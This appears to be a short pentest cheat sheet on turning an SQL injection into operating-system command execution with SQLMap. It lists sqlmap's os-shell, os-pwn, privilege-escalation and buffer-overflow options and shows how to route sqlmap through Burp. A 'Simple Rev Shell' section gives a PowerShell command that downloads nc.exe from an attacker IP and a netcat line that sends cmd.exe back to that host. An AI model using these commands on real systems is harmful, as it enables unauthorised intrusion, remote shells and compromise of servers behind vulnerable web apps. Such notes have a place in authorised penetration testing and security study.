SQLMap

SQLMap can be used for easy MSSQL code exec on found injection points in web apps.

sqlmap -r inject.txt --os-shell

(where inject.txt contains vulnerable POST request)

Other commands for exec:

   Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

When having issues with shell, try add flag: --flush-session

Simple Rev Shell

powershell.exe wget http://192.168.45.162/nc.exe -OutFile c:\\Windows\\Tasks\\nc.exe

c:\\Windows\\Tasks\\nc.exe -e cmd.exe 192.168.45.162 443

Proxy through Burp + other syntax

Right click request in Burp -> Copy to file request_from_burp

sqlmap -r request_from_burp --proxy="http://127.0.0.1:8080" --force-ssl --dbms="oracle" --level=5 --risk=3

--proxy: To easily proxy SQLMap request through your Burp

--force-ssl: Needed for Burp

--dbms: To specify underlying database (if known)

--level/risk: to specify level and risk

Last updated 1 year ago

hashtagSimple Rev Shell

hashtagProxy through Burp + other syntax

Simple Rev Shell

Proxy through Burp + other syntax